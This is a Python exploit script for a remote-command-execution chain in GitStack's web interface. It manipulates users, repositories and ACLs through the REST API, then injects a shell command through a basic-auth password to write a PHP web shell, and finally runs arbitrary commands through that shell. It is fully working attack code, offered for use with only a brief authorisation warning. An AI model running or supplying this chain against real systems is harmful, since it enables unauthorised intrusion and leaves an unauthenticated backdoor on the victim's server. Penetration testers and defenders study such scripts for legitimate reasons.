import os
import sys
from time import sleep

import requests
from requests.auth import HTTPBasicAuth
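# GitStack web-interface remote-command-execution chain (Python 3), with the
# 3-second pause after each step that this paste added. The chain:
#   1. pick an existing GitStack user or create one (username/password below),
#   2. turn on the web repository interface,
#   3. pick an existing repository or create one,
#   4. give the user access to it and remove the "everyone" entry,
#   5. log in to /web/ with a basic-auth "password" that is really a shell
#      fragment, which writes a PHP web shell into GitStack's gitphp directory,
#   6. POST a command to that shell and print the output.
#
# Only run this against systems you are explicitly authorised to test. It is
# noisy and leaves state behind on the target: a user with the password below,
# a repository, an enabled web interface, changed repository ACLs, and a PHP
# web shell that runs system($_POST['a']) for anyone who can reach its URL.
# Remove all of these afterwards.
#
# Usage: python <this script> [host[:port]] [command]

ip = "localhost:8000"

# What command you want to execute
command = 'whoami'

repository = 'rce'
username = 'rce'
password = 'rce'
# Sent as both the csrftoken cookie and the csrfmiddlewaretoken form field.
# The value is arbitrary; presumably the server only requires the two to match.
csrf_token = 'token'

# File name of the PHP web shell under /web/ and the path it is written to on
# the (Windows) target. The two must agree, so one is derived from the other.
backdoor_name = 'exploit-saltinbank.php'
backdoor_path = 'c:\\GitStack\\gitphp\\' + backdoor_name

# Seconds allowed per HTTP call; without a timeout a stalled target hangs the
# script forever.
request_timeout = 15

# Pause between steps, carried over from the paste (presumably to let GitStack
# apply each change before the next request; the paste's indentation is lost,
# so the exact placement is inferred).
step_delay = 3


def fail(message):
    """Print *message* and exit with status 1.

    The original used os._exit(0), which reported success to the caller and
    skipped interpreter cleanup even though the chain had failed.
    """
    print(message)
    sys.exit(1)


def contains_any(text, markers):
    """Return True if any string in *markers* occurs in *text*.

    The REST endpoints answer with short plain-text messages, so success is
    detected by substring matching against the known replies.
    """
    return any(marker in text for marker in markers)


def backdoor_password(path):
    """Return the basic-auth "password" that writes a PHP web shell to *path*.

    The `&&` and the redirection only do anything because the server evidently
    hands the password to a shell; the file it creates executes
    system($_POST['a']) with no authentication of its own.
    """
    return 'p && echo "<?php system($_POST[\'a\']); ?>" > ' + path


def show_text(text):
    """Print *text* in the console encoding, replacing unencodable characters.

    Encoding and decoding again avoids both UnicodeEncodeError on narrow
    consoles and the b'...' repr that printing bytes produces on Python 3.
    """
    encoding = sys.stdout.encoding or 'utf-8'
    print(text.encode(encoding, errors='replace').decode(encoding, errors='replace'))


def _find_or_create_user(base):
    """Return an existing GitStack username, or create `username` and return it."""
    print("[+] Get user list")
    user_list = []
    try:
        r = requests.get(base + "/rest/user/", timeout=request_timeout)
        user_list = r.json()
        user_list.remove('everyone')
    except (requests.RequestException, ValueError, AttributeError) as exc:
        # Best effort, as in the original: an unreadable list (unreachable
        # host, non-JSON reply, no "everyone" entry) just means we create one.
        print("[-] Could not read user list ({})".format(exc))
    if isinstance(user_list, list) and user_list:
        found = user_list[0]
        print("[+] Found user {}".format(found))
        return found
    print("[+] Create user")
    r = requests.post(base + "/rest/user/",
                      data={'username': username, 'password': password},
                      timeout=request_timeout)
    if not contains_any(r.text, ("User created", "User already exist")):
        fail("[-] Cannot create user")
    return username


def _enable_web_interface(base):
    """Turn on GitStack's web repository interface if it is not already on."""
    url = base + "/rest/settings/general/webinterface/"
    r = requests.get(url, timeout=request_timeout)
    if "true" in r.text:
        print("[+] Web repository already enabled")
        return
    print("[+] Enable web repository")
    r = requests.put(url, data='{"enabled" : "true"}', timeout=request_timeout)
    if "Web interface successfully enabled" not in r.text:
        fail("[-] Cannot enable web interface")


def _find_or_create_repository(base):
    """Return the name of an existing repository, or create `repository` and return it."""
    print("[+] Get repositories list")
    r = requests.get(base + "/rest/repository/", timeout=request_timeout)
    repository_list = r.json()
    if repository_list:
        found = repository_list[0]['name']
        print("[+] Found repository {}".format(found))
        return found
    print("[+] Create repository")
    r = requests.post(base + "/rest/repository/",
                      cookies={'csrftoken': csrf_token},
                      data={'name': repository, 'csrfmiddlewaretoken': csrf_token},
                      timeout=request_timeout)
    if not contains_any(r.text, ("The repository has been successfully created",
                                 "Repository already exist")):
        fail("[-] Cannot create repository")
    return repository


def _set_access(base, repo, user):
    """Grant *user* access to *repo* and revoke the "everyone" entry."""
    print("[+] Add user to repository")
    user_url = base + "/rest/repository/{}/user/{}/".format(repo, user)
    r = requests.post(user_url, timeout=request_timeout)
    if not contains_any(r.text, ("added to", "has already")):
        fail("[-] Cannot add user to repository")

    print("[+] Disable access for anyone")
    everyone_url = base + "/rest/repository/{}/user/{}/".format(repo, "everyone")
    r = requests.delete(everyone_url, timeout=request_timeout)
    # The original matched the literal "everyone removed from rce", which is
    # wrong whenever an existing repository with another name was picked; the
    # reply presumably echoes the repository name -- verify against a target.
    if not contains_any(r.text, ("everyone removed from {}".format(repo), "not in list")):
        fail("[-] Cannot remove access for anyone")


def _drop_backdoor(base, repo, user):
    """Write the PHP web shell by logging in to /web/ with the shell-fragment password."""
    print("[+] Create backdoor in PHP")
    r = requests.get(base + '/web/index.php?p={}.git&a=summary'.format(repo),
                     auth=HTTPBasicAuth(user, backdoor_password(backdoor_path)),
                     timeout=request_timeout)
    show_text(r.text)


def _run_command(base, cmd):
    """POST *cmd* to the web shell and print whatever it returns."""
    print("[+] Execute command")
    r = requests.post(base + "/web/" + backdoor_name, data={'a': cmd},
                      timeout=request_timeout)
    show_text(r.text)


def main(argv=None):
    """Run the whole chain against `ip` (or argv[0]) with `command` (or argv[1]).

    Exits with status 1 on any failed step or transport error.
    """
    args = sys.argv[1:] if argv is None else list(argv)
    target = args[0] if args else ip
    cmd = args[1] if len(args) > 1 else command
    base = "http://" + target
    try:
        user = _find_or_create_user(base)
        sleep(step_delay)
        _enable_web_interface(base)
        sleep(step_delay)
        repo = _find_or_create_repository(base)
        sleep(step_delay)
        _set_access(base, repo, user)
        sleep(step_delay)
        _drop_backdoor(base, repo, user)
        sleep(step_delay)
        _run_command(base, cmd)
    except requests.RequestException as exc:
        # Timeouts and connection errors previously escaped as a traceback.
        fail("[-] Request to {} failed: {}".format(target, exc))


if __name__ == "__main__":
    main()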